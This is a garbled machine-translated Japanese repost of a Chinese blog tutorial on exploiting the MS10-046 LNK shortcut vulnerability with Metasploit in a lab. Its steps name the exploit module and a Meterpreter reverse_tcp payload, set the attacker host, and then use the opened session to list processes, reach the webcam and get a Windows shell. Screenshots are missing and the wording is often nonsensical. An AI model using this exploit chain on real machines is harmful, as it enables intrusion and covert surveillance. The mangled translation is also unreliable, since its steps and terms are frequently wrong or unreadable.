LNKファイルのショートカットの脆弱性攻撃と守備を達成するためのフレームワークを使用して、MSFの浸透

LNKファイルのショートカットの脆弱性攻撃と守備を達成するためのフレームワークを使用して、MSFの浸透

実験環境:
攻撃:カーリーのLinux
ドローン:Windowsの2007 / Windows XPの
1、オープンカーリーのLinux、オープンMSFへのコマンドライン:
ここに画像を挿入説明
2検索MS10-046#照会の脆弱性モジュールによって
ここに画像を挿入説明
3、使用して悪用/窓/ブラウザ/ ms10_046_shortcut_icon_dllloader #脆弱性モジュール入力
ここに画像を挿入説明
:4、設定ペイロード接続被害者のマシンを、カリのLinuxへの接続立ち直る
セットペイロードのWindows / Meterpreter / reverse_tcp
ここに画像を挿入説明
カーリーのLinuxのIPとバウンスの接続がIPアドレスをバック攻撃者がある設定、5:
SET srvhostカーリーのLinux攻撃者は、IP、IP#を設定
#セットのIPアドレスバウンスバック、そのカーリーのLinux(自分のマシンまでに戻ってバウンスするので)、設定されたlhost攻撃機を
他のパラメータのデフォルト値。

6、共有接続を生成するために、攻撃アウトキャリー:
ここに画像を挿入説明
被害者のマシンにアクセスできるように7を、リンクダウン共有コピー、:
ドローンインターフェースは、(2003年のエピソードは、2007年の途中で一時的に交換が表示されますが、この実験には影響しません)、2つのファイルがありましたが
ここに画像を挿入説明
航空機を攻撃しますこの時点で、あなたはインターフェイスエコー情報のリバウンド見ることができます:ここに画像を挿入説明
8を、接続セッション-i#ビューの会話の裏に応じて1に追いつくために、そのビューを想定し、数字に追いつくことができます:
ここに画像を挿入説明
我々はまた、このpsコマンドによる方法でそれを見ることができます。
ここに画像を挿入説明
これが示すように、ドローンの観点から仮想マシンではない、のようなあなたはまた、カメラやオンにすると、helpコマンドのヘルプを取得するには、他のコマンドを呼び出すことができます。
ここに画像を挿入説明
ここに画像を挿入説明
名前でCMDコンピュータユーザーを入力して、Windowsのシェルを入力することができます-を判断することができます管理者は、スーパーです管理者は、すべてのコマンドの説明を行うことができます。
ここに画像を挿入説明

リリース7件のオリジナルの記事 ウォンの賞賛3 ビュー236

おすすめ

転載: blog.csdn.net/qq_41397071/article/details/104023697